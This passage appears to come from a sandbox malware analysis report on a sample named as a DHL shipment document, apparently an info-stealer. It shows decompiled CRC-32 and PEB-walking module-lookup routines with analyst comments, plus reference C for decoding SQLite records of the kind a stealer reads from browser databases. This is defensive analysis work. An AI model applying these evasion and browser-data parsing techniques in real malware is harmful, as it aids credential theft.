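unsigned sqlite_get_varint(const uint8_t *p, size_t len, uint64_t *v)
{
    uint64_t val = 0;
    for (unsigned i = 0; i < 8; i++) {
        if (i >= len) return 0;                /* truncated: flag set, no byte left */
        val = (val << 7) | (p[i] & 0x7f);
        if ((p[i] & 0x80) == 0) {              /* the per-byte bit-7 test of E0040549C */
            *v = val;
            return i + 1;
        }
    }
    if (len < 9) return 0;
    *v = (val << 8) | p[8];                    /* 9th byte: all eight bits, no flag */
    return 9;
}

/* Inverse: encode v into out (9 bytes available). Returns bytes written. */
unsigned sqlite_put_varint(uint8_t *out, uint64_t v)
{
    if (v > 0x00ffffffffffffffULL) {           /* top 8 bits in use: 9-byte form */
        out[8] = (uint8_t)(v & 0xff);
        v >>= 8;
        for (int i = 7; i >= 0; i--) { out[i] = (uint8_t)((v & 0x7f) | 0x80); v >>= 7; }
        return 9;
    }
    uint8_t groups[8];
    unsigned n = 0;
    do { groups[n++] = (uint8_t)(v & 0x7f); v >>= 7; } while (v != 0);
    for (unsigned i = 0; i < n; i++)           /* most significant group first */
        out[i] = groups[n - 1 - i] | (i + 1 < n ? 0x80 : 0);
    return n;
}

/* Encode then decode; returns the encoded length, 0 if the trip is lossy. */
unsigned sqlite_varint_roundtrip(uint64_t v)
{
    uint8_t buf[9];
    uint64_t back = 0;
    unsigned n = sqlite_put_varint(buf, v);
    unsigned m = sqlite_get_varint(buf, n, &back);
    return (n == m && back == v) ? n : 0;
}

/* Payload size of a record column from its serial type (SQLite file format). */
uint64_t sqlite_serial_type_size(uint64_t t)
{
    static const uint8_t fixed[12] = {0, 1, 2, 3, 4, 6, 8, 8, 0, 0, 0, 0};
    if (t < 12) return fixed[t];
    return (t - 12) / 2;                       /* even: BLOB, odd: TEXT, same length rule */
}

/* A record header is a varint header length followed by one serial-type varint
 * per column: this is where a stealer needs the decoder to walk table rows.
 * Returns the column count, 0 on a malformed or truncated header. */
unsigned sqlite_parse_record_header(const uint8_t *rec, size_t rec_len, uint64_t *types, unsigned max)
{
    uint64_t hdr_len = 0;
    unsigned pos = sqlite_get_varint(rec, rec_len, &hdr_len);
    unsigned ncol = 0;
    if (pos == 0 || hdr_len > rec_len) return 0;
    while (pos < hdr_len && ncol < max) {
        unsigned n = sqlite_get_varint(rec + pos, (size_t)hdr_len - pos, &types[ncol]);
        if (n == 0) return 0;
        pos += n;
        ncol++;
    }
    return ncol;
}

/* Constructed header (not from the dump): length 4, then INT8, TEXT(5), constant 1. */
static const uint8_t kExampleHeader[] = {0x04, 0x01, 0x17, 0x09};
/* Constructed 9-byte vector: 0x81, seven times 0x80, then 0x00 encodes 1 << 57. */
static const uint8_t kNineByte[9] = {0x81, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x00};

unsigned example_header_columns(void)
{
    uint64_t t[4];
    return sqlite_parse_record_header(kExampleHeader, sizeof kExampleHeader, t, 4);
}

uint64_t example_header_type(unsigned i)
{
    uint64_t t[4] = {0, 0, 0, 0};
    sqlite_parse_record_header(kExampleHeader, sizeof kExampleHeader, t, 4);
    return i < 4 ? t[i] : 0;
}

uint64_t example_decode_nine_byte(void)
{
    uint64_t v = 0;
    sqlite_get_varint(kNineByte, sizeof kNineByte, &v);
    return v;
}

unsigned example_decode_truncated(void)
{
    uint64_t v = 0;
    return sqlite_get_varint(kNineByte, 4, &v);  /* four flagged bytes, then nothing: 0 */
}

int main(void)
{
    printf("1<<57 from 9 bytes: %llu, truncated read: %u, columns: %u\n",
           (unsigned long long)example_decode_nine_byte(), example_decode_truncated(),
           example_header_columns());
    return 0;
}
```

Running a decoder like this over the record headers of a suspect's browser databases is also the quickest way to confirm what a sample of this family could have read: the serial types tell you the column layout before any payload is touched.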

                    C-Code - Quality: 92%
                    			/* Table-driven CRC-32 over (buffer, length), written as a register-preserving
                    			   assembly routine. The decompiler did not account for the 32 bytes 'pushad'
                    			   pushes, so its _a36 / _a40 are really the first and second argument and
                    			   _a28 is the saved-EAX slot: storing the result there makes 'popad' return
                    			   it in EAX. Right-shift step, 0xffffffff seed and final complement match the
                    			   reflected CRC-32 used by zlib, but the 256-entry table at 0x418ab0 is not
                    			   part of this excerpt, so the polynomial cannot be confirmed from it.
                    			   Returns 0 for a NULL buffer. */
                    			#define CRC_STEP(c) (((c) >> 0x00000008) ^  *(0x418ab0 + (0x000000ff & (c)) * 4))
                    			E004029D4(signed int _a28, signed int _a36, unsigned int _a40) {
                    				signed int _t26;
                    				signed int _t27;
                    				signed int _t28;
                    				signed int _t39;
                    				signed int _t47;
                    				unsigned int _t69;
                    				unsigned int _t70;
                    				signed int _t71;
                    				signed int _t73;
                    				signed int _t75;
                    				signed int* _t76;
                    
                    				asm("pushad");
                    				_t75 = _a36;                                  /* data pointer */
                    				_t69 = _a40;                                  /* length in bytes */
                    				_t26 = 0;
                    				if(_t75 != 0) {
                    					_t27 = 0xffffffff;                            /* 'or eax, -1': a 32-bit seed, not the 64-bit constant the decompiler printed */
                    					if(_t69 != 0) {
                    						/* one byte at a time until the pointer is 4-byte aligned */
                    						while((_t75 & 0x00000003) != 0) {
                    							_t47 = _t27 ^  *_t75;
                    							_t75 = _t75 + 1;
                    							_t27 = CRC_STEP(_t47);
                    							_t69 = _t69 - 1;
                    							if(_t69 != 0) {
                    								continue;
                    							}
                    							break;
                    						}
                    						_t73 = _t69 & 0x00000007;                     /* bytes left after the 8-byte blocks */
                    						_t70 = _t69 >> 3;                             /* number of 8-byte blocks */
                    						/* unrolled: XOR in one dword, four table steps, XOR in the next
                    						   dword, four more; the decompiler had inlined all eight steps
                    						   into a single expression */
                    						while(_t70 != 0) {
                    							_t76 = _t75 + 4;
                    							_t39 = CRC_STEP(CRC_STEP(CRC_STEP(CRC_STEP(_t27 ^  *_t75)))) ^  *_t76;
                    							_t75 =  &(_t76[1]);
                    							_t27 = CRC_STEP(CRC_STEP(CRC_STEP(CRC_STEP(_t39))));
                    							_t70 = _t70 - 1;
                    						}
                    						_t71 = _t73;
                    						if(_t71 != 0) {
                    							do {                                          /* trailing bytes */
                    								_t28 = _t27 ^  *_t75;
                    								_t75 = _t75 + 1;
                    								_t27 = CRC_STEP(_t28);
                    								_t71 = _t71 - 1;
                    							} while (_t71 != 0);
                    						}
                    					}
                    					_t26 =  !_t27;                                /* '!' is the decompiler's NOT: bitwise complement */
                    				}
                    				_a28 = _t26;                                      /* saved-EAX slot, restored by popad */
                    				asm("popad");
                    				return _t26;
                    			}

                    (instruction address column of the side-by-side view: 0x004029d4 to 0x00402ab1)

                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                    • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                    • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                    • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                    Uniqueness

                    Uniqueness Score: -1.00%
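
E004029D4 above is a table-driven CRC-32 with the standard (crc >> 8) ^ table[(crc ^ byte) & 0xff] step; the decompiler expanded its 8-bytes-per-iteration unrolling into the two long expressions. The block below is an added example written for this page, not code from the sample or the report. It rebuilds the table from the IEEE polynomial 0xEDB88320, which is an assumption because the sample's own table at 0x418ab0 is not in this excerpt, and implements both the plain byte loop and the sample's align-then-8-bytes schedule so the two can be checked against each other and against the published check value crc32("123456789") = 0xCBF43926.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

static uint32_t crc_table[256];
static int crc_table_ready;

/* Build the reflected table. Assumption: the IEEE polynomial 0xEDB88320;
 * the sample's table at 0x418ab0 is not part of the excerpt above. */
static void crc_ensure_table(void)
{
    if (crc_table_ready) return;
    for (uint32_t i = 0; i < 256; i++) {
        uint32_t c = i;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (c >> 1) ^ 0xEDB88320u : (c >> 1);
        crc_table[i] = c;
    }
    crc_table_ready = 1;
}

/* Entry i of the table, to compare against a dump of 0x418ab0 + i * 4. */
uint32_t crc32_table_entry(unsigned i)
{
    crc_ensure_table();
    return crc_table[i & 0xff];
}

/* The step the decompiler spells out as (x >> 8) ^ *(0x418ab0 + (x & 0xff) * 4). */
static uint32_t crc_step(uint32_t c)
{
    return (c >> 8) ^ crc_table[c & 0xff];
}

/* Plain byte-at-a-time reference. */
uint32_t crc32_simple(const uint8_t *p, size_t n)
{
    crc_ensure_table();
    uint32_t c = 0xffffffffu;                    /* 'or eax, -1' seed */
    while (n--) c = crc_step(c ^ *p++);
    return ~c;                                   /* final NOT */
}

/* The schedule of E004029D4: bytes until p is 4-byte aligned, then per 8-byte
 * block XOR a little-endian dword, four steps, XOR the next dword, four steps;
 * then the n & 7 leftover bytes. Produces the same CRC as the plain loop. */
uint32_t crc32_unrolled(const uint8_t *p, size_t n)
{
    crc_ensure_table();
    uint32_t c = 0xffffffffu;
    while (n && ((uintptr_t)p & 3)) { c = crc_step(c ^ *p++); n--; }
    size_t tail = n & 7;
    for (size_t blocks = n >> 3; blocks; blocks--, p += 8) {
        c ^= (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
        c = crc_step(crc_step(crc_step(crc_step(c))));
        c ^= (uint32_t)p[4] | (uint32_t)p[5] << 8 | (uint32_t)p[6] << 16 | (uint32_t)p[7] << 24;
        c = crc_step(crc_step(crc_step(crc_step(c))));
    }
    while (tail--) c = crc_step(c ^ *p++);
    return ~c;
}

uint32_t crc32_of_string(const char *s)
{
    size_t n = 0;
    while (s[n]) n++;
    return crc32_simple((const uint8_t *)s, n);
}

/* Cross-check both routines on a constructed 64-byte pattern at every
 * alignment offset 0..7 and length 0..40. Returns 1 if they always agree. */
int crc32_unrolled_matches(void)
{
    uint8_t pattern[64];
    for (unsigned i = 0; i < sizeof pattern; i++) pattern[i] = (uint8_t)(i * 37 + 11);
    for (unsigned off = 0; off < 8; off++)
        for (size_t len = 0; len <= 40; len++)
            if (crc32_simple(pattern + off, len) != crc32_unrolled(pattern + off, len))
                return 0;
    return 1;
}

int main(void)
{
    printf("crc32(\"123456789\") = 0x%08X\n", (unsigned)crc32_of_string("123456789"));
    printf("table[1] = 0x%08X, table[255] = 0x%08X, unrolled agrees: %d\n",
           (unsigned)crc32_table_entry(1), (unsigned)crc32_table_entry(255),
           crc32_unrolled_matches());
    return 0;
}
```

To settle the polynomial question, read 1024 bytes at 0x418ab0 from the memory dump named under "Memory Dump Source" and compare them, as little-endian dwords, with crc32_table_entry(): with 0xEDB88320 entry 1 is 0x77073096 and entry 255 is 0x2D02EF8D. If the dump differs, the sample uses another polynomial or a custom table, and the routine above is the right shape to plug that table into.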

                    C-Code - Quality: 90%
                    			/* Find a loaded module by a value derived from its name, via the PEB: _a4 is
                    			   the value being searched for and the return value is that module's
                    			   DllBase (0 if none matches). fs:[0x30] is the PEB, PEB+0x0c its Ldr
                    			   (PEB_LDR_DATA), Ldr+0x0c the first entry of InLoadOrderModuleList; in an
                    			   x86 LDR_DATA_TABLE_ENTRY +0x18 is DllBase and +0x28 is FullDllName.Buffer.
                    			   E00402C77 / E004032EA prepare the name and E00402C38 reduces it to the
                    			   value compared with _a4, so the hash itself is not visible in this
                    			   excerpt; this is the resolve-imports-without-an-import-table pattern
                    			   behind the "reads the PEB" signature above. Decompiler artefacts: _t19,
                    			   _t25 and _t35 are never assigned. One quirk of the code itself: the walk
                    			   stops on reaching the first entry again rather than the list head, so the
                    			   head sentinel at Ldr+0x0c is visited once as if it were an entry, with
                    			   Ldr fields read where DllBase and FullDllName would be. */
                    			E0040317B(intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				void* __ecx;
                    				intOrPtr _t17;
                    				void* _t21;
                    				intOrPtr* _t23;
                    				void* _t26;
                    				void* _t28;
                    				intOrPtr* _t31;
                    				void* _t33;
                    				signed int _t34;
                    
                    				_push(_t25);
                    				_t1 =  &_v8;
                    				 *_t1 = _v8 & 0x00000000;                                     /* _v8 = 0 */
                    				_t34 =  *_t1;
                    				_v8 =  *[fs:0x30];                                            /* PEB */
                    				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));     /* PEB->Ldr->InLoadOrderModuleList.Flink */
                    				_t31 = _t23;
                    				do {
                    					_v12 =  *((intOrPtr*)(_t31 + 0x18));                       /* entry->DllBase */
                    					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));      /* entry->FullDllName.Buffer */
                    					_pop(_t26);
                    					_t35 = _t28;
                    					if(_t28 != 0) {
                    						E004032EA(_t35, _t28, 0);
                    						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);  /* E00405D24 is used like a string length here */
                    						_t33 = _t33 + 0x14;                                    /* esp adjustment after the calls above */
                    						if(_a4 == _t21) {
                    							_t17 = _v12;                                           /* match: hand back DllBase */
                    							return _t17;
                    						}
                    					}
                    					_t31 =  *_t31;                                             /* Flink: next entry */
                    				} while (_t23 != _t31);
                    				_t17 = 0;
                    				return _t17;
                    			}

                    (instruction address column of the side-by-side view: 0x0040317f to 0x004031e0)

                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                    Uniqueness

                    Uniqueness Score: -1.00%